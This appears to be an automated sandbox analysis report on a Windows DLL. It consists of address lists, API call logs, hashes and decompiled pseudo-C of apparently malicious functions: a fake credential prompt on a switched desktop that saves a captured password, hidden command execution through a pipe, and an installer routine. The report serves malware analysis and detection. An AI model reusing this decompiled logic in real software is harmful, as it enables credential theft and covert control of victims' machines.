                                                                                                                        0x6f33974c
                                                                                                                        0x6f339750
                                                                                                                        0x6f339754
                                                                                                                        0x6f339758
                                                                                                                        0x6f339760
                                                                                                                        0x6f339764
                                                                                                                        0x6f339768
                                                                                                                        0x6f33976c
                                                                                                                        0x6f339774
                                                                                                                        0x6f339778
                                                                                                                        0x6f33977c
                                                                                                                        0x6f339783
                                                                                                                        0x6f33978e
                                                                                                                        0x6f339795
                                                                                                                        0x6f33979c
                                                                                                                        0x6f3397a3
                                                                                                                        0x6f3397a8
                                                                                                                        0x6f3397ad
                                                                                                                        0x6f339b60
                                                                                                                        0x6f339b61
                                                                                                                        0x00000000
                                                                                                                        0x6f339b61
                                                                                                                        0x6f3397c8
                                                                                                                        0x6f3397cc
                                                                                                                        0x6f339b5f
                                                                                                                        0x00000000
                                                                                                                        0x6f339b5f
                                                                                                                        0x6f3397d3
                                                                                                                        0x6f3397d9
                                                                                                                        0x6f3397da
                                                                                                                        0x6f3397ec
                                                                                                                        0x6f3397f4
                                                                                                                        0x6f3397f8
                                                                                                                        0x6f339800
                                                                                                                        0x6f339808
                                                                                                                        0x6f339808
                                                                                                                        0x6f33980e
                                                                                                                        0x6f33980e
                                                                                                                        0x6f339814
                                                                                                                        0x6f339822
                                                                                                                        0x6f339828
                                                                                                                        0x6f339834
                                                                                                                        0x6f339836
                                                                                                                        0x6f339836
                                                                                                                        0x6f339844
                                                                                                                        0x6f33985b
                                                                                                                        0x6f33985f
                                                                                                                        0x6f339958
                                                                                                                        0x6f339958
                                                                                                                        0x6f33995e
                                                                                                                        0x6f339965
                                                                                                                        0x6f339974
                                                                                                                        0x6f339976
                                                                                                                        0x6f33997a
                                                                                                                        0x6f33997e
                                                                                                                        0x6f339982
                                                                                                                        0x6f339986
                                                                                                                        0x6f33998a
                                                                                                                        0x6f339990
                                                                                                                        0x6f339997
                                                                                                                        0x6f339998
                                                                                                                        0x6f339999
                                                                                                                        0x6f3399a5
                                                                                                                        0x6f3399a6
                                                                                                                        0x6f3399b0
                                                                                                                        0x6f339b49
                                                                                                                        0x6f339b52
                                                                                                                        0x6f339b58
                                                                                                                        0x6f339b5c
                                                                                                                        0x00000000
                                                                                                                        0x6f3399c5
                                                                                                                        0x6f3399d9
                                                                                                                        0x6f3399db
                                                                                                                        0x6f3399e1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3399eb
                                                                                                                        0x6f3399ec
                                                                                                                        0x6f3399ed
                                                                                                                        0x6f3399f9
                                                                                                                        0x6f3399fa
                                                                                                                        0x6f339a04
                                                                                                                        0x6f339b3a
                                                                                                                        0x6f339b43
                                                                                                                        0x00000000
                                                                                                                        0x6f339b43
                                                                                                                        0x6f339a10
                                                                                                                        0x6f339a10
                                                                                                                        0x6f339a10
                                                                                                                        0x6f339a16
                                                                                                                        0x6f339a1f
                                                                                                                        0x6f339a24
                                                                                                                        0x6f339a25
                                                                                                                        0x6f339a26
                                                                                                                        0x6f339a2b
                                                                                                                        0x6f339a2c
                                                                                                                        0x6f339a31
                                                                                                                        0x6f339a32
                                                                                                                        0x6f339a3a
                                                                                                                        0x6f339a3e
                                                                                                                        0x6f339a42
                                                                                                                        0x6f339a46
                                                                                                                        0x6f339a50
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f339a56
                                                                                                                        0x6f339a5b
                                                                                                                        0x6f339a5c
                                                                                                                        0x6f339a64
                                                                                                                        0x6f339a69
                                                                                                                        0x6f339a6e
                                                                                                                        0x6f339a6e
                                                                                                                        0x6f339a74
                                                                                                                        0x6f339a75
                                                                                                                        0x6f339a7d
                                                                                                                        0x6f339a8a
                                                                                                                        0x6f339a8f
                                                                                                                        0x6f339a90
                                                                                                                        0x6f339a91
                                                                                                                        0x6f339a96
                                                                                                                        0x6f339a97
                                                                                                                        0x6f339a98
                                                                                                                        0x6f339a99
                                                                                                                        0x6f339a9a
                                                                                                                        0x6f339aa5
                                                                                                                        0x6f339aa7
                                                                                                                        0x6f339aac
                                                                                                                        0x6f339aac
                                                                                                                        0x6f339ab2
                                                                                                                        0x6f339ab3
                                                                                                                        0x6f339ab8
                                                                                                                        0x6f339abd
                                                                                                                        0x6f339ac4
                                                                                                                        0x6f339ac9
                                                                                                                        0x6f339ace
                                                                                                                        0x6f339ad5
                                                                                                                        0x6f339ada
                                                                                                                        0x6f339adb
                                                                                                                        0x6f339ae5
                                                                                                                        0x6f339ae8
                                                                                                                        0x6f339af0
                                                                                                                        0x6f339af5
                                                                                                                        0x6f339afa
                                                                                                                        0x6f339b12
                                                                                                                        0x6f339b1a
                                                                                                                        0x6f339afc
                                                                                                                        0x6f339afc
                                                                                                                        0x6f339b0a
                                                                                                                        0x6f339b0a
                                                                                                                        0x6f339afa
                                                                                                                        0x6f339b1f
                                                                                                                        0x6f339b1f
                                                                                                                        0x6f339b26
                                                                                                                        0x6f339b2c
                                                                                                                        0x6f339b34
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f339b34
                                                                                                                        0x6f339bab
                                                                                                                        0x6f339bb8
                                                                                                                        0x6f339bbe
                                                                                                                        0x00000000
                                                                                                                        0x6f339bbe
                                                                                                                        0x6f339865
                                                                                                                        0x6f33986d
                                                                                                                        0x6f339872
                                                                                                                        0x6f339873
                                                                                                                        0x6f3398d7
                                                                                                                        0x6f3398d9
                                                                                                                        0x6f3398d9
                                                                                                                        0x6f3398f8
                                                                                                                        0x6f339913
                                                                                                                        0x6f33991f
                                                                                                                        0x6f339925
                                                                                                                        0x6f339947
                                                                                                                        0x6f33994d
                                                                                                                        0x6f33994d
                                                                                                                        0x6f339951
                                                                                                                        0x6f339952
                                                                                                                        0x00000000
                                                                                                                        0x6f339952
                                                                                                                        0x6f33987b
                                                                                                                        0x6f339883
                                                                                                                        0x6f33988d
                                                                                                                        0x6f339898
                                                                                                                        0x6f3398a7
                                                                                                                        0x6f3398a9
                                                                                                                        0x6f3398a9
                                                                                                                        0x6f3398a7
                                                                                                                        0x6f3398c1
                                                                                                                        0x00000000
                                                                                                                        0x6f3398c7
                                                                                                                        0x00000000
                                                                                                                        0x6f3398c7
                                                                                                                        0x6f3398c1
                                                                                                                        0x6f33985f

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F335130: LogonUserW.ADVAPI32(0099B7A8,0099B7A8,6F3396ED,00000002,00000000,0099EC68), ref: 6F335150
                                                                                                                          • Part of subcall function 6F335130: GetLastError.KERNEL32 ref: 6F33515C
                                                                                                                          • Part of subcall function 6F335130: CloseHandle.KERNEL32(?), ref: 6F335177
                                                                                                                        • SwitchDesktop.USER32(00000000,00000000,00000000), ref: 6F33970C
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339718
                                                                                                                        • LoadLibraryA.KERNEL32(credui.dll,00000000,00000000), ref: 6F339723
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000004,FF000000), ref: 6F3397BB
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3397C2
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F3397DA
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 6F339814
                                                                                                                        • PathAddBackslashA.SHLWAPI(?), ref: 6F339822
                                                                                                                        • lstrcatA.KERNEL32(?,rstrui.exe), ref: 6F339844
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000020), ref: 6F339855
                                                                                                                        • LoadStringW.USER32(00000000,000000AB,00000CAE,00000080), ref: 6F33987B
                                                                                                                        • LoadStringW.USER32(00000000,00000091,00000CB2,00000080), ref: 6F33989F
                                                                                                                        • LoadStringW.USER32(00000000,000000D2,00000DB0,00000926), ref: 6F3398B9
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000926,00000000,?,?,00000104,?,00000014,74784F20), ref: 6F339952
                                                                                                                        • wsprintfW.USER32 ref: 6F33998A
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399B6
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399CC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F3399D3
                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000404), ref: 6F339A64
                                                                                                                        • RtlZeroMemory.NTDLL(00000404,00000202), ref: 6F339A7D
                                                                                                                        • RtlZeroMemory.NTDLL(00000606,00000404), ref: 6F339AB3
                                                                                                                        • RtlZeroMemory.NTDLL(00000A0A,000002A4), ref: 6F339AC4
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(PWD,00000000,00000404,0098A4D0), ref: 6F339B0A
                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 6F339B26
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B3C
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B43
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B4B
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000104,?,00000014,74784F20), ref: 6F339B52
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,00000004,FF000000), ref: 6F339B61
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 6F339B77
                                                                                                                        • SwitchDesktop.USER32(00000000), ref: 6F339B84
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 6F339B91
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 6F339BBE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeLoadMemoryZero$DesktopLibraryProcessString$AllocErrorLastSleepSwitchThread$BackslashCloseDirectoryHandleLogonPathPrivateProfileSystemTaskUserWritelstrcatwsprintf
                                                                                                                        • String ID: $%s\%s$PWD$credui.dll$rstrui.exe$wuaueng.dll
                                                                                                                        • API String ID: 938628543-1540689510
                                                                                                                        • Opcode ID: 12de891eb235b013c2c9a16d6a4c44d2a8890b5ec882c7b90e570de0375a22dc
                                                                                                                        • Instruction ID: fd8a445435fc3b6a829dbbcb351fdb4702dcea6a5c0bca04883be252e6cc30e8
                                                                                                                        • Opcode Fuzzy Hash: 12de891eb235b013c2c9a16d6a4c44d2a8890b5ec882c7b90e570de0375a22dc
                                                                                                                        • Instruction Fuzzy Hash: 60D191B2A04399EFE720DF65CC88F5BBBEDFB89710F00491DFA8596141DB70A4148B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332ED0, Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 227memoryfileprocessCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E6F332ED0(intOrPtr* _a12) {
				intOrPtr* _v4;
				signed int _v8;
				CHAR* _v12;
				intOrPtr _v16;
				struct _STARTUPINFOA _v84;
				struct _PROCESS_INFORMATION _v100;
				void* _v108;
				void* _v112;
				CHAR* _v116;
				void* _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				CHAR* _t52;
				int _t54;
				long _t69;
				intOrPtr _t82;
				long _t85;
				void* _t90;
				struct _OVERLAPPED* _t110;
				void* _t111;
				int _t112;
				int _t116;
				void* _t121;

				_t110 = 0;
				_v116 = 0;
				_t90 = 0;
				_v100.hThread.nLength = 0xc;
				_v100.dwProcessId = 0;
				_v100.dwThreadId = 1;
				_v112 = 0;
				_v108 = 0;
				if(CreatePipe( &_v112,  &_v108,  &(_v100.hThread), 0) == 0) {
					 *_a12 = 0;
					return 0;
				} else {
					_push(0x44);
					_push( &(_v84.dwX));
					L6F33C2EE();
					_t52 = _v116;
					_push(0x10);
					_push( &(_v100.dwProcessId));
					_v84.lpDesktop = 0x44;
					_v84.lpReserved2 = 0x101;
					_v12 = _t52;
					_v16 = _t52;
					L6F33C2EE();
					_t54 = CreateProcessA(0, _v12, 0, 0, 1, 0x8000000, 0, 0,  &_v84,  &_v100);
					CloseHandle(_v124);
					if(_t54 != 0) {
						_t111 = HeapAlloc(GetProcessHeap(), 8, 0x401);
						_v120 = _t111;
						if(_t111 != 0) {
							_v116 = GetTickCount() + _v8 * 0x3e8;
							_v136 = 0;
							if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
								while(1) {
									_t69 = _v136;
									if(_t69 == 0) {
										goto L23;
									}
									 *((char*)(_t69 + _t111)) = 0;
									_t116 = MultiByteToWideChar(1, 0, _t111, _v136, 0, 0);
									if(_t116 != 0) {
										_t31 = _t116 + 2; // 0x2
										_t121 = HeapAlloc(GetProcessHeap(), 8, _t116 + _t31);
										if(_t121 != 0) {
											if(MultiByteToWideChar(1, 0, _t111, _v136, _t121, _t116) != 0) {
												_t112 = WideCharToMultiByte(0xfde9, 0, _t121, _t116, 0, 0, 0, 0);
												if(_t112 != 0) {
													_t82 = _v132 + _t112;
													_v132 = _t82;
													_push(_t82 + 1);
													if(_t90 != 0) {
														_t85 = HeapReAlloc(GetProcessHeap(), 0, _t90, ??);
														if(_t85 != 0) {
															goto L12;
														} else {
															HeapFree(GetProcessHeap(), _t85, _t90);
															_t90 = 0;
															goto L14;
														}
														goto L24;
													} else {
														_t85 = HeapAlloc(GetProcessHeap(), 8, ??);
														L12:
														_t90 = _t85;
														if(_t90 != 0) {
															WideCharToMultiByte(0xfde9, 0, _t121, _t116, _t90 - _t112 + _v132, _t112, 0, 0);
														}
													}
												}
												L14:
												_t111 = _v120;
											}
											HeapFree(GetProcessHeap(), 0, _t121);
										}
									}
									if(GetTickCount() >= _v116 || _t90 == 0) {
										_push(0);
										_push(_v100.hProcess);
										L6F33C30C();
									} else {
										if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
											continue;
										} else {
										}
									}
									goto L23;
								}
							}
							L23:
							HeapFree(GetProcessHeap(), 0, _t111);
						}
						L24:
						CloseHandle(_v100.hThread);
						CloseHandle(_v100);
						_t110 = _v132;
					}
					CloseHandle(_v128);
					 *_v4 = _t110;
					return _t90;
				}
			}




























                                                                                                                        0x6f332ed5
                                                                                                                        0x6f332ee7
                                                                                                                        0x6f332eeb
                                                                                                                        0x6f332eed
                                                                                                                        0x6f332ef5
                                                                                                                        0x6f332ef9
                                                                                                                        0x6f332f01
                                                                                                                        0x6f332f05
                                                                                                                        0x6f332f11
                                                                                                                        0x6f333173
                                                                                                                        0x6f33317c
                                                                                                                        0x6f332f17
                                                                                                                        0x6f332f19
                                                                                                                        0x6f332f1f
                                                                                                                        0x6f332f20
                                                                                                                        0x6f332f25
                                                                                                                        0x6f332f29
                                                                                                                        0x6f332f2f
                                                                                                                        0x6f332f30
                                                                                                                        0x6f332f38
                                                                                                                        0x6f332f40
                                                                                                                        0x6f332f47
                                                                                                                        0x6f332f4e
                                                                                                                        0x6f332f71
                                                                                                                        0x6f332f84
                                                                                                                        0x6f332f88
                                                                                                                        0x6f332fa2
                                                                                                                        0x6f332fa4
                                                                                                                        0x6f332faa
                                                                                                                        0x6f332fd0
                                                                                                                        0x6f332fda
                                                                                                                        0x6f332fe6
                                                                                                                        0x6f332ff0
                                                                                                                        0x6f332ff0
                                                                                                                        0x6f332ff6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333000
                                                                                                                        0x6f333014
                                                                                                                        0x6f333018
                                                                                                                        0x6f33301e
                                                                                                                        0x6f333032
                                                                                                                        0x6f333036
                                                                                                                        0x6f333050
                                                                                                                        0x6f333069
                                                                                                                        0x6f33306d
                                                                                                                        0x6f333073
                                                                                                                        0x6f333075
                                                                                                                        0x6f33307a
                                                                                                                        0x6f33307d
                                                                                                                        0x6f333101
                                                                                                                        0x6f333109
                                                                                                                        0x00000000
                                                                                                                        0x6f33310b
                                                                                                                        0x6f333114
                                                                                                                        0x6f33311a
                                                                                                                        0x00000000
                                                                                                                        0x6f33311a
                                                                                                                        0x00000000
                                                                                                                        0x6f33307f
                                                                                                                        0x6f333088
                                                                                                                        0x6f33308e
                                                                                                                        0x6f33308e
                                                                                                                        0x6f333092
                                                                                                                        0x6f3330ab
                                                                                                                        0x6f3330ab
                                                                                                                        0x6f333092
                                                                                                                        0x6f33307d
                                                                                                                        0x6f3330b1
                                                                                                                        0x6f3330b1
                                                                                                                        0x6f3330b1
                                                                                                                        0x6f3330bf
                                                                                                                        0x6f3330bf
                                                                                                                        0x6f333036
                                                                                                                        0x6f3330cf
                                                                                                                        0x6f333122
                                                                                                                        0x6f333124
                                                                                                                        0x6f333125
                                                                                                                        0x6f3330d5
                                                                                                                        0x6f3330ef
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3330f5
                                                                                                                        0x6f3330ef
                                                                                                                        0x00000000
                                                                                                                        0x6f3330cf
                                                                                                                        0x6f332ff0
                                                                                                                        0x6f33312a
                                                                                                                        0x6f333134
                                                                                                                        0x6f33313a
                                                                                                                        0x6f333140
                                                                                                                        0x6f333145
                                                                                                                        0x6f33314c
                                                                                                                        0x6f33314e
                                                                                                                        0x6f33314e
                                                                                                                        0x6f333157
                                                                                                                        0x6f333162
                                                                                                                        0x6f33316b
                                                                                                                        0x6f33316b

                                                                                                                        APIs
                                                                                                                        • CreatePipe.KERNEL32 ref: 6F332F09
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F332F20
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F332F4E
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?,?), ref: 6F332F71
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F332F84
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000401,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F332F95
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F332F9C
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F332FB0
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6F332FDE
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6F33300E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333025
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33302C
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6F333048
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F333063
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333081
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333088
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6F3330AB
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F3330B8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F3330BF
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3330C5
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6F3330E7
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?), ref: 6F3330FA
                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333101
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33310D
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333114
                                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 6F333125
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33312D
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333134
                                                                                                                        • CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333145
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33314C
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333157
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocByteCharCloseHandleMultiWide$Free$CountCreateFileMemoryReadTickZero$PipeTerminate
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1574224466-2746444292
                                                                                                                        • Opcode ID: 3b637f1cb17450afd01af3a6585aca2d6a4881f01100fb07a57f387ddcb12d4d
                                                                                                                        • Instruction ID: c56d1d7cf3803eb3caa04411d334526c855fb94d2ac1a9ef05d1e66a5cf51e63
                                                                                                                        • Opcode Fuzzy Hash: 3b637f1cb17450afd01af3a6585aca2d6a4881f01100fb07a57f387ddcb12d4d
                                                                                                                        • Instruction Fuzzy Hash: 65718C72A44385ABE720DFA5CC49F5BBBEDFBC9B10F00491DB645D7280DAB0E4148B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3344D0, Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 202memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E6F3344D0(void* __ebx, void* __edi) {
				CHAR* _t35;
				int _t36;
				char _t40;
				void* _t42;
				int _t46;
				CHAR* _t47;
				void* _t50;
				void* _t55;
				CHAR* _t57;
				void* _t64;
				void* _t65;
				void* _t66;
				CHAR* _t67;
				CHAR* _t69;
				signed int _t70;
				signed int _t74;
				CHAR* _t78;
				void* _t79;
				CHAR* _t82;
				char _t83;
				void* _t84;
				CHAR* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				intOrPtr _t92;
				intOrPtr _t93;
				CHAR* _t94;
				void* _t96;
				void* _t98;
				void* _t99;
				void* _t100;

				_t89 = __edi;
				_t66 = __ebx;
				 *(_t98 + 0xc) = 0;
				if(M6F340544 == 0) {
					L23:
					return  *(_t98 + 0xc);
				} else {
					_t35 = M6F3404CC; // 0x99d818
					_t69 = M6F3404D8; // 0x99b240
					_t82 = M6F3404DC; // 0x99b1c8
					_t36 = GetPrivateProfileIntA(_t82, _t69, 0, _t35);
					_t93 =  *((intOrPtr*)(_t98 + 0x38));
					if(_t93 != 0 || _t36 != 0) {
						if( *((intOrPtr*)(_t98 + 0x3c)) != 0) {
							goto L7;
						} else {
							_t64 = M6F3404D8; // 0x99b240
							_t65 = E6F3338A0(_t64, 0, 0, 1);
							_t98 = _t98 + 0x10;
							if(_t65 == (0 | _t93 == 0x00000000)) {
								goto L7;
							}
						}
						goto L23;
					} else {
						if( *((intOrPtr*)(_t98 + 0x3c)) != _t36) {
							L7:
							_t96 = HeapAlloc(GetProcessHeap(), 8, 0x800);
							if(_t96 != 0) {
								_t83 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
								_push(_t66);
								_push(_t89);
								wsprintfA(_t96, "%s%s%s", _t83, "vpn", ".cab");
								_t40 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
								_t7 = _t96 + 0x201; // 0x201
								_t67 = _t7;
								 *((intOrPtr*)(_t98 + 0x50)) = wsprintfA(_t67, "%s%s%c", _t40, "vpn", 0x5c);
								_t42 = E6F332DC0(_t96, _t67, 0);
								_t98 = _t98 + 0x34;
								if(_t42 != 0) {
									_t70 = M6F3404EC; // 0x1
									asm("sbb ecx, ecx");
									wsprintfA(_t96, "%s%d%c", _t67, ( ~_t70 & 0xffffffea) + 0x56, 0x5c);
									_t9 =  &(_t67[0x401]); // 0x602
									_t94 = _t9;
									_t46 = wsprintfA(_t94, "%s%s%s", _t96, "install", ".exe");
									_t99 = _t98 + 0x28;
									_t47 =  &(( &(_t94[1]))[_t46]);
									 *(_t99 + 0x10) = _t47;
									if( *((intOrPtr*)(_t99 + 0x44)) == 0) {
										_t84 = M6F3404D8; // 0x99b240
										wsprintfA(_t47, "%s %s", "remove", _t84);
										_t100 = _t99 + 0x10;
									} else {
										_t79 = M6F3404D8; // 0x99b240
										wsprintfA(_t47, "%s \"%s%s%s\" %s", "install", _t96, _t79, ".inf", _t79);
										_t100 = _t99 + 0x1c;
									}
									_t74 =  *(_t100 + 0x10);
									_push(_t100 + 0x14);
									_push(0x1e);
									_push(0);
									 *(_t100 + 0x2c) = 0;
									_t50 = E6F334230(0, _t94, _t74);
									_t98 = _t100 + 0x18;
									if(_t50 != 0) {
										if(E6F334300() != 0) {
											_t88 = M6F3404D8; // 0x99b240
											wsprintfA( *(_t98 + 0x10), "%s %s", "restart", _t88);
											_t74 =  *(_t98 + 0x20);
											_push(0);
											_push(0x1e);
											_push(0);
											E6F334230(0, _t94, _t74);
											_t98 = _t98 + 0x28;
										}
										_t92 =  *((intOrPtr*)(_t98 + 0x44));
										if(_t92 == 0) {
											_t55 = M6F3404D8; // 0x99b240
											E6F333700(_t55, 1);
											_t98 = _t98 + 8;
										} else {
											_t87 = M6F3404D8; // 0x99b240
											E6F3338A0(_t87, 0, 0, 0);
